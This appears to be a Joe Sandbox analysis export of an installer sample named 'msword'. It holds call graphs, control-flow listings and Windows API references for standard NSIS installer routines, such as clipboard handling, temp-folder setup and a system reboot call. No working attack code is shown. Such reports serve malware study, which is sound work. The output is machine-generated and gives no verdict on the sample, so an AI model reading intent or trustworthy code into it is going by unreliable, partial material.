401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                        Executed Functions

                                                                                        Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                                        • API String ID: 2110491804-2409696222
                                                                                        • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                        • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                        Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                        APIs
                                                                                        • #17.COMCTL32 ref: 004038A2
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                        • API String ID: 2435955865-239407132
                                                                                        • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                        • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                        Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
